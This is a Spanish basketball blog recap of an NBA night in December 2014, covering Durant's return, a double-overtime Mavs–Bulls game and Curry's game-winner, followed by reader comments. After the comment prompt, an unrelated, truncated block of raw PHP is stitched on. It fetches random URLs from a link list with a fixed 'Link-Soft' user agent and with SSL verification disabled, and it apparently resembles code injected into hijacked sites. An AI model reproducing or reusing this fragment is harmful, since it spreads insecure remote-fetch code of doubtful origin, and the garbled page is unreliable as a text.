La crónica: Volver

03 de December de 2014 por MagicJohnson32

Los regresos no son fáciles. Uno llega rodeado de expectativas propias y ajenas, con frecuencia demasiado elevadas, y a menudo la realidad golpea con fuerza. Anoche volvió el MVP, que seguramente no quería perderse una madrugada de NBA espectacular. El debut de Kevin Durant esta temporada, tras causar baja los primeros 17 partidos por una fractura en el pie que ha puesto en riesgo la presencia de los Thunder en Playoffs, no fue tan dulce como esperaban sus aficionados pero sí resultó un excelente presagio para lo que estaba por venir. El game winner de Steph Curry, unas 5 horas más tarde, fue la guinda que coronó una jornada memorable.

A ver si logramos resumirla.

kds_back

Oklahoma City Thunder 104 – New Orleans Pelicans 112

“Kevin va a jugar”. Lo confirmó Scott Brooks por la tarde: el MVP 2013-2014 jugaría ante los Pelicans. Su regreso da a la temporada en curso una sensación diferente, como de que ya ha empezado lo serio. Y muy serio fue el rival que se encontró anoche Durant, unos Pelicans que pusieron en evidencia la defensa de los Thunder y pusieron fin a una racha de tres derrotas seguidas con un Anthony Davis inconmensurable (y que tuvo a bien humillar a un Kendrick Perkins que aún no sabemos en qué estaba pensando) y bien secundado por Evans, Holiday y Anderson. A KD no se le podía pedir mucho más que los 27 puntos, 3 rebotes y 3 asistencias que sumó en 30 minutos, pero él mismo reconocía a la conclusión del encuentro que necesita tiempo para recuperar la forma y la confianza. Aunque tiempo no le sobra precisamente a su equipo, que ya está a 5,5 partidos de los puestos de Playoffs.

Dallas Mavericks 132 – Chicago Bulls 129

Bendita locura de partido la que se vio en el United Center entre dos de los mejores equipos de la liga, un big shot tras otro por parte de ambos equipos hasta que D-Rose lanzó un airball que suponía la capitulación de los Bulls tras dos prórrogas. Rose había forzado previamente la segunda prórroga con un triple a tabla con una mano, pero el héroe de la noche fue Monta Ellis, que primero le sacó una falta de tres tiros a Hinrich para llevar el partido a su primera prórroga y, más tarde, se fue hasta los 38 puntos con un triplazo que puso a los Mavs por delante de forma definitiva. Thibs tuvo a Pau Gasol 50 minutos en cancha y el de Sant Boi firmó una actuación excelente que no obtuvo premio.

Orlando Magic 97 – Golden State Warriors 98

Si tu equipo gana por 2 puntos y enfrente tienes a Stephen Curry, sobre todo, por lo que más quieras, no dejes que lance un triple. Ésa es la lección que sacan Tobias Harris y los Magic de su visita al ORACLE Arena. Orlando tuvo la victoria en su mano con una ventaja de 9 puntos a 4 minutos para el final. Entonces despertaron los Splash Brothers y tres triples consecutivos empataron el partido antes de que una canasta de Harris diese de nuevo ventaja a los visitantes. Tras errores por ambos bandos, el balón quedó en manos de Curry. Y sucedió lo siguiente:

Game over.

Resto de la jornada

Los Cavs se anotaron una nueva victoria a costa de los ilusionantes Bucks, que dieron siempre la cara en su visita al Q con un gran Knight y posiblemente el mejor partido de Jabari Parker como profesional. El Big Three de los Cavs tuvo que mostrar su mejor versión e incluso se hizo necesaria la aportación de Mike Miller para despachar a los Bucks (108-111). En Detroit, los Lakers volvieron a comprobar que la vida en el Este es mucho más plácida, y elevaron a 4-0 su balance contra equipos de dicha conferencia tras imponerse 106-96. Kobe, agotado, cedió protagonismo a Jordan Hill, que se merendó a Drummond. El día en que vimos a Curry anotar su primer triple para ganar un partido, también vimos a Robin López anotar un game winner para tumbar a los Nuggets (105-103). Terry Stotts tuvo la valentía de diseñar la jugada decisiva para López en una noche especialmente dulce para Aldridge, autor de 39 puntos y que en la acción final se conformó con dar la asistencia. También presenciamos un nuevo derrumbe de los Celtics tras un sensacional inicio de partido. Endosaron 42 puntos a los Hawks en el primer cuarto y llegaron a situarse +23 antes de que su propia inconsistencia y los triples de Korver impulsaran la remontada de Atlanta (105-109). En NY se disputó el duelo entre los dos equipos de la ciudad, que se saldó con victoria del menos malo, es decir, los Nets (98-93). La excelente segunda parte de Joe Johnson pudo más que los 5 triples de Calderón y los Nets ya meten la cabeza en puestos de Playoffs. Y por último, en Phoenix y Sacramento mandaron los bases: Dragic tumbó a los Pacers (99-116) con su mejor actuación del año y Lowry hizo lo propio en pista de los Kings (117-109), combativos sin Cousins pero insuficientes frente al mejor equipo del Este.

PREMIOS

MVP: Goran Dragic no venía disputando una buena temporada pero ayer se desquitó de todos sus males con 34 puntos (11 de 15 en TC), 4 rebotes, 3 asistencias y 4 robos. En Denver, LaMarcus Aldridge asistió a Robin López en la canasta decisiva de la noche cuando todos esperaban que se la jugara él. Antes había anotado 39 puntos y capturado 11 rebotes. Y en New Orleans, Anthony Davis se encargó de aguar la fiesta de los Thunder con números al alcance de nadie más que él: 25 puntos, 10 rebotes, 6 robos, 4 asistencias y 4 tapones.

Rookie: Gran tarjeta de presentación la que dejó Jabari Parker a LeBron y cía. 22 puntos (11 de 15) y 8 rebotes del número 2 del draft.

Sorpresa: Devin Harris acertó en los 6 triples que intentó ante los Bulls y acabó el partido con 20 puntos y 8 asistencias.

Decepción: A Lou Williams no le han sentado del todo bien su primera nominación a jugador de la semana. Ayer acabó el partido con sólo 4 puntos y un 1 de 9 en TC. Serge Ibaka se quedó en 6 puntos y 3 rebotes y poco aportó para que los Thunder pudieran celebrar con victoria la vuelta de Durant a las pistas.

Esfuerzo en vano: Los Bucks exigieron el máximo a los todopoderosos Cavaliers en buena parte por culpa de Brandon Knight que se fue a los 27 puntos, 8 asistencias, 6 rebotes y 3 robos. Pau Gasol jugó 50 minutos en la derrota de los suyos ante los Mavs y acabó con 29 puntos y 14 rebotes.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. Azabel dice:
    #1

    curry es de los casos mas extraños que he visto, practicamente no juega al baquet, solo se aleja y tira tiros rapìdsimo y de cualquier distancia al aro y entran, increible

      Citar

  2. Ruxixón dice:
    #2

    Pobre Perkins,jajaja.

    Bonita noche no cabe duda,gran nivel de basket y épicos momentos.No sé si habrá alguna página que recopile cuántas prórrogas han jugado los equipos en los últimos años,pero vamos,estoy seguro que los Bulls se llevarían la palma.La de hoy llegó en un gran error de Hinrich que cometió una falta tardía cuando Ellis ya preparaba el movimiento de tiro a la desperada más allá de la línea de triple,con Gasol en el 2×1.Vamos,regalazo para empatar el partido y dar lugar a esas 2 OT con las que Dallas se llevó la victoria.Siempre lo repito,pero hay que ver lo que tiene que ver Carlisle en el rendimiento de Ellis,ese jugador que salió de Golden State en un movimiento muy discutido y tildado de mandarinero con poca IQ con su compa Jennings en los Bucks.

    Hoy me animaré con el 76ers – Wolves,si mañana no doy señales,ha sido un placer chicos…jajajja.

      Citar

  3. rumbero dice:
    #3

    Ruxixón:
    Hoy me animaré con el 76ers – Wolves,si mañana no doy señales,ha sido un placer chicos…jajajja.

    Un héroe. Todo mi apoyo desde aquí

      Citar

  4. Nacho dice:
    #4

    Ruxixón:

    Hoy me animaré con el 76ers – Wolves,si mañana no doy señales,ha sido un placer chicos…jajajja.

    Pero ves partidos de high school!!!?

      Citar

  5. Nacho dice:
    #5

    @Ruxixón; cuando he visto el resumen (vale, fue un partidazo, pero yo soy un cobarde y me quedé dormido en el descanso) he pensado lo mismo de Hinrich. Ande vas, muchacho? La cara de Gasol lo dice todo.
    Y hablando de Pau, que vale que le tengo aprecio, menudo temporadón se está haciendo. Y mola verlo en la cancha animar a Rose, o los guiños con Butler. El tío es de esos líderes silenciosos, de esos que mandan dejando que manden otros, y que otros cojan el protagonismo. En ese sentido es muy similar a Dirk. Mola este año ver al alemán dando protagonismo a otros. esas cosas deberían puntuar en la Fantasy, y no es porque tenga a los dos, no, es por jejeje…

      Citar

  6. Azabel dice:
    #6

    anoche vi el juego entre Cavs y Bucks, y debo deecir quer pesima espina que me dan los Cavs, por lejos el peor banco de la liga (justamente quiza ante el mejor), obligaron a jugar a sus tres grandes mas de 40 minutossl y ni asi pudieron cerrar con hologura el juego

    Lo de Love es preocupante, en defensa es el peor lastre que he visto, y en ataque es demasiado limitado, no se quien le recomendo bajar de peso, pero hoy es un flaco chupado sin musculo al que le cuesta incluso tomar rebotes y en ataque solo puede lanzar de 3 puntos puesto qwue cada vez que va cerca de los aros no tiene peso ni fuerza

    Waiters es un caso sin resolver, en un mal equipo parecia bueno, pero ahora no vale nada,

    a Lebron varios partidos le he visto bajkar los brazos resignado en determinadas jugadas, y no lo veo comodo ni contento teniendo que forzar tanto la marcha para superar el 50%

    otro tema, esta bien que hay que hacer feliz a Lebron, pero alguien puede explicarme por que los cavs ficharon a James Jones

      Citar

  7. Ruxixón dice:
    #7

    Gracias por los ánimos,jajaj! Por cierto,si alguien quiere ver buen baloncesto universitario hoy es el partido entre los 2 grandes favoritos de la temporada,Duke y Wisconsin,Okafor,el presumible nº1 del próximo draft contra Kaminsky,una institución a nivel NCAA.Pero vamos que mas allá del nombre,baloncesto del bueno.

      Citar

  8. Azabel dice:
    #8

    ah jugado 3 partidos y un total de 15 minutos, cobrando un millon y medio al año, solo para tener contento a Lebron?

    ya en miami no jugaba nunca, no entiendo el por que de su fichaje

    similar es lo de Miller, y lo digo despues de un bue partido suyo, pero lo cierto es que no jugado por desicion del entrenador en varios partios y en muchos otros solo ha entrado para mostrar que ya no puede defender a nadie ni rebotear

    no digo que en algun partido este de racha y pueda lanzar como anoche, pero gastar casi 3 millones en un alero cuando tienes a Lebron y Marion, me parece un despilfarro de dinero, que podria haberse utilizado en otras posiciones mas flojas del equipo

      Citar

  9. Nacho dice:
    #9

    Habemus nuevo esguince! parece más flojo que el de Rubio, pero no me atrevo a pronosticar, dadas mis nulas aptitudes.
    Por cierto, es Noah. Un Noah que ha empezado intenso en todos los aspectos

      Citar

  10. Nacho dice:
    #10

    Lanza los libres! parece que va bien

      Citar

  11. jona dice:
    #11

    Azabel:
    curry es de los casos mas extraños que he visto, practicamente no juega al baquet, solo se aleja y tira tiros rapìdsimo y de cualquier distancia al aro y entran, increible

    SI Curry no juega al básquet quien si lo hace , lo que hay que leer dioss santo.

      Citar

  12. Jonybob dice:
    #12

    jona: SI Curry no juega al básquet quien si lo hace , lo que hay que leer dioss santo.

    Me cito , mejor jugador del mes para el que NO JUEGA al basquet, di que si

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>